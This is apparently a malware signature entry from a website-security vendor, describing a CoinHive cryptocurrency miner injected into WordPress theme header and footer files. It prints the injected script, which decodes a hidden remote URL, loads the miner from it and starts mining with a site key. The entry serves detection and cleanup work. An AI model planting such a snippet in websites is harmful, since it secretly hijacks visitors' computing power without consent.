Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.cryptominer.4

Description: Website contains an encrypted CoinHive JavaScript miner library, which usually means that it's used without webmaster's consent.

The script can be injected into header.php and footer.php of WordPress themes:

<scr ipt type='text/javascript'>$(document).ready(function() {$.getScript(atob("aHR0cHM6Ly85OW​xlYXZlLmNvbS93cC1pbmNsdWRlcy9q​cy9jZG4tanF1ZXJ5Lm1pbi5qcw=="), function(){var jqueryhelper = new CoinHive.Anonymous("SL67plLGdyPW8YmiOn8FJfHySoR5zkYh");jqueryhelper​.start();jqueryhelper.​setThrottle(0.​05);})​;});</script>



Affecting: Mostly WordPress sites.

Mitigation
How to clean a hacked WordPress site

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb